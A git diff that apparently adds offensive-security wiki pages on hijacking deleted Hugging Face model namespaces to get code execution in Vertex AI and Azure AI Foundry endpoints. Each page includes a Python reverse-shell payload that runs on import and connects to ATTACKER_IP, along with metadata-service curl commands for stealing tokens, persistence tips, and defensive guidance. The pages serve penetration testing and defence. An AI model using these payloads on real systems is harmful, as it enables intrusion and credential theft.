diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 1cedf0205..7d93f52b0 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -96,6 +96,7 @@ - [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md) - [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md) - [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md) + - [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md) - [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md) - [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md) - [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md) @@ -461,6 +462,7 @@ - [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md) - [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md) - [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) + - [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md) - [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) - [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md) - [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 234962b1c..52b7c1b91 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +az-azure-ai-foundry-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md new file mode 100644 index 000000000..959e01d3b --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md @@ -0,0 +1,104 @@ +# Azure - AI Foundry Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Azure AI Foundry Model Catalog includes many Hugging Face (HF) models for one-click deployment. +- HF model identifiers are Author/ModelName. If an HF author/org is deleted, anyone can re-register that author and publish a model with the same ModelName at the legacy path. +- Pipelines and catalogs that pull by name only (no commit pinning/integrity) will resolve to attacker-controlled repos. When Azure deploys the model, loader code can execute in the endpoint environment, granting RCE with that endpoint’s permissions. + +Common HF takeover cases: +- Ownership deletion: Old path 404 until takeover. +- Ownership transfer: Old path 307 to the new author while old author exists. If the old author is later deleted and re-registered, the redirect breaks and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +```bash +# Check author/org existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Check model path +curl -I https://huggingface.co// +# 307 -> redirect (transfer case), 404 -> deleted until takeover +``` + +## End-to-end Attack Flow against Azure AI Foundry + +1) In the Model Catalog, find HF models whose original authors were deleted or transferred (old author removed) on HF. +2) Re-register the abandoned author on HF and recreate the ModelName. +3) Publish a malicious repo with loader code that executes on import or requires trust_remote_code=True. +4) Deploy the legacy Author/ModelName from Azure AI Foundry. The platform pulls the attacker repo; loader executes inside the Azure endpoint container/VM, yielding RCE with endpoint permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # or powershell on Windows images + +if os.environ.get("AZUREML_ENDPOINT","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- AI Foundry deployments that integrate HF typically clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some paths require trust_remote_code=True. +- Access usually matches the endpoint’s managed identity/service principal permissions. Treat it as an initial access foothold for data access and lateral movement within Azure. + +## Post-Exploitation Tips (Azure Endpoint) + +- Enumerate environment variables and MSI endpoints for tokens: + +```bash +# Azure Instance Metadata Service (inside Azure compute) +curl -H "Metadata: true" \ + "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" +``` + +- Check mounted storage, model artifacts, and reachable Azure services with the acquired token. +- Consider persistence by leaving poisoned model artifacts if the platform re-pulls from HF. + +## Defensive Guidance for Azure AI Foundry Users + +- Pin models by commit when loading from HF: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models to a trusted internal registry and deploy from there. +- Continuously scan codebases and defaults/docstrings/notebooks for hard-coded Author/ModelName that are deleted/transferred; update or pin. +- Validate author existence and model provenance prior to deployment. + +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md index e24133696..8f4597e1a 100644 --- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/README.md @@ -2,4 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} +{{#ref}} +gcp-vertex-ai-post-exploitation.md +{{#endref}} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md new file mode 100644 index 000000000..b43cf5669 --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md @@ -0,0 +1,123 @@ +# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse + +{{#include ../../../banners/hacktricks-training.md}} + +## Scenario + +- Vertex AI Model Garden allows direct deployment of many Hugging Face (HF) models. +- HF model identifiers are Author/ModelName. If an author/org on HF is deleted, the same author name can be re-registered by anyone. Attackers can then create a repo with the same ModelName at the legacy path. +- Pipelines, SDKs, or cloud catalogs that fetch by name only (no pinning/integrity) will pull the attacker-controlled repo. When the model is deployed, loader code from that repo can execute inside the Vertex AI endpoint container, yielding RCE with the endpoint’s permissions. + +Two common takeover cases on HF: +- Ownership deletion: Old path 404 until someone re-registers the author and publishes the same ModelName. +- Ownership transfer: HF issues 307 redirects from old Author/ModelName to the new author. If the old author is later deleted and re-registered by an attacker, the redirect chain is broken and the attacker’s repo serves at the legacy path. + +## Identifying Reusable Namespaces (HF) + +- Old author deleted: the page for the author returns 404; model path may return 404 until takeover. +- Transferred models: the old model path issues 307 to the new owner while the old author exists. If the old author is later deleted and re-registered, the legacy path will resolve to the attacker’s repo. + +Quick checks with curl: + +```bash +# Check author/org existence +curl -I https://huggingface.co/ +# 200 = exists, 404 = deleted/available + +# Check old model path behavior +curl -I https://huggingface.co// +# 307 = redirect to new owner (transfer case) +# 404 = missing (deletion case) until someone re-registers +``` + +## End-to-end Attack Flow against Vertex AI + +1) Discover reusable model namespaces that Model Garden lists as deployable: +- Find HF models in Vertex AI Model Garden that still show as “verified deployable”. +- Verify on HF if the original author is deleted or if the model was transferred and the old author was later removed. + +2) Re-register the deleted author on HF and recreate the same ModelName. + +3) Publish a malicious repo. Include code that executes on model load. Examples that commonly execute during HF model load: +- Side effects in __init__.py of the repo +- Custom modeling_*.py or processing code referenced by config/auto_map +- Code paths that require trust_remote_code=True in Transformers pipelines + +4) A Vertex AI deployment of the legacy Author/ModelName now pulls the attacker repo. The loader executes inside the Vertex AI endpoint container. + +5) Payload establishes access from the endpoint environment (RCE) with the endpoint’s permissions. + +Example payload fragment executed on import (for demonstration only): + +```python +# Place in __init__.py or a module imported by the model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # Or python -c exec ... + +if os.environ.get("VTX_AI","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Notes +- Real-world loaders vary. Many Vertex AI HF integrations clone and import repo modules referenced by the model’s config (e.g., auto_map), which can trigger code execution. Some uses require trust_remote_code=True. +- The endpoint typically runs in a dedicated container with limited scope, but it is a valid initial foothold for data access and lateral movement in GCP. + +## Post-Exploitation Tips (Vertex AI Endpoint) + +Once code is running inside the endpoint container, consider: +- Enumerating environment variables and metadata for credentials/tokens +- Accessing attached storage or mounted model artifacts +- Interacting with Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.) +- Persistence in the model artifact if the platform re-pulls the repo + +Enumerate instance metadata if accessible (container dependent): + +```bash +curl -H "Metadata-Flavor: Google" \ + http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token +``` + +## Defensive Guidance for Vertex AI Users + +- Pin models by commit in HF loaders to prevent silent replacement: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Mirror vetted HF models into a trusted internal artifact store/registry and deploy from there. +- Continuously scan codebases and configs for hard-coded Author/ModelName that are deleted/transferred; update to new namespaces or pin by commit. +- In Model Garden, verify model provenance and author existence before deployment. + +## Recognition Heuristics (HTTP) + +- Deleted author: author page 404; legacy model path 404 until takeover. +- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content. + +```bash +curl -I https://huggingface.co// | egrep "^HTTP|^location" +``` + +## Cross-References + +- See broader methodology and supply-chain notes: + +{{#ref}} +../../pentesting-cloud-methodology.md +{{#endref}} + +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) + +{{#include ../../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/pentesting-cloud/pentesting-cloud-methodology.md b/src/pentesting-cloud/pentesting-cloud-methodology.md index d3eb7a659..ea387a405 100644 --- a/src/pentesting-cloud/pentesting-cloud-methodology.md +++ b/src/pentesting-cloud/pentesting-cloud-methodology.md @@ -420,6 +420,75 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo - [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec) +## AI/ML Model Registry Supply-Chain Attacks (Hugging Face Namespace Reuse) + +A systemic weakness in how models are referenced and deployed can be abused across clouds and OSS: many pipelines resolve models by Author/ModelName (e.g., Hugging Face), without pinning to a specific commit or verifying integrity. If an author/org on Hugging Face is deleted, anyone can re-register the same author name and recreate the same ModelName, silently replacing what downstream systems pull when they resolve by name only. Transferred models can also be abused by breaking the old-path redirect if the old author is later deleted and re-registered by an attacker. + +Key cases on Hugging Face hub: +- Ownership deletion: old Author/ModelName returns 404 until takeover by a new account that recreates the author and model. +- Ownership transfer: old Author/ModelName issues 307 to the new author; if the old author is later deleted and re-registered by an attacker, the legacy path resolves to attacker content. + +Recognition heuristics (HTTP): + +```bash +# Author existence +curl -I https://huggingface.co/ # 200 exists, 404 deleted/available + +# Legacy model path behavior +curl -I https://huggingface.co// # 307 redirect (transfer) | 404 deleted until takeover +``` + +Exploitation playbook (abstract): +1) Identify reusable namespaces (deleted authors or transferred models whose old author was removed) still referenced by code, defaults, notebooks, docs, or cloud model catalogs. +2) Re-register the abandoned author on Hugging Face; recreate the same ModelName under that author. +3) Publish a malicious repo. Ensure model loader executes code on import (e.g., __init__.py side effects, custom modeling_*.py referenced by auto_map). Some loaders require trust_remote_code=True. +4) Rely on downstream systems that fetch by name only. When they deploy or from_pretrained("Author/ModelName"), the attacker’s code executes inside the target runtime (e.g., cloud inference endpoint container/VM) with that endpoint’s permissions. + +Payload on load (example): + +```python +# __init__.py or a module imported by model loader +import os, socket, subprocess, threading + +def _rs(host, port): + s = socket.socket(); s.connect((host, port)) + for fd in (0,1,2): + try: + os.dup2(s.fileno(), fd) + except Exception: + pass + subprocess.call(["/bin/sh","-i"]) # demo purposes only + +# Gate on an env var if desired +if os.environ.get("INFERENCE_ENDPOINT","1") == "1": + threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start() +``` + +Cloud platform impact and examples: +- Google Vertex AI Model Garden: direct deploy of HF models; hijacked namespaces can yield RCE in the endpoint container when the platform loads attacker repo code. + +{{#ref}} +gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md +{{#endref}} + +- Microsoft Azure AI Foundry: Model Catalog includes HF models; hijacked namespaces can yield RCE in the deployed endpoint with that endpoint’s permissions. + +{{#ref}} +azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md +{{#endref}} + +Detection and hardening: +- Treat Author/ModelName like any third-party dependency. Continuously scan codebases, defaults, docstrings, comments, model cards, and notebooks for HF identifiers and resolve their current ownership. +- Pin to a specific commit in loaders to prevent silent replacement: + +```python +from transformers import AutoModel +m = AutoModel.from_pretrained("Author/ModelName", revision="") +``` + +- Clone vetted models to trusted internal registries/artifact stores and reference those in production. +- Before deploying from cloud model catalogs, verify the current author and provenance of the referenced HF model. Be aware that catalog verifications can drift if upstream authors are deleted/re-registered. + ## Google ### GCP @@ -454,6 +523,12 @@ azure-security/ You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a little bit limited). However, those limitations appear in some PS modules and can be bypassed accessing the features **via the web application**. +## References + +- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/) +- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo) +- [Transformers docs: Security and remote code](https://huggingface.co/docs/transformers/installation#security-and-remote-code) + {{#include ../banners/hacktricks-training.md}}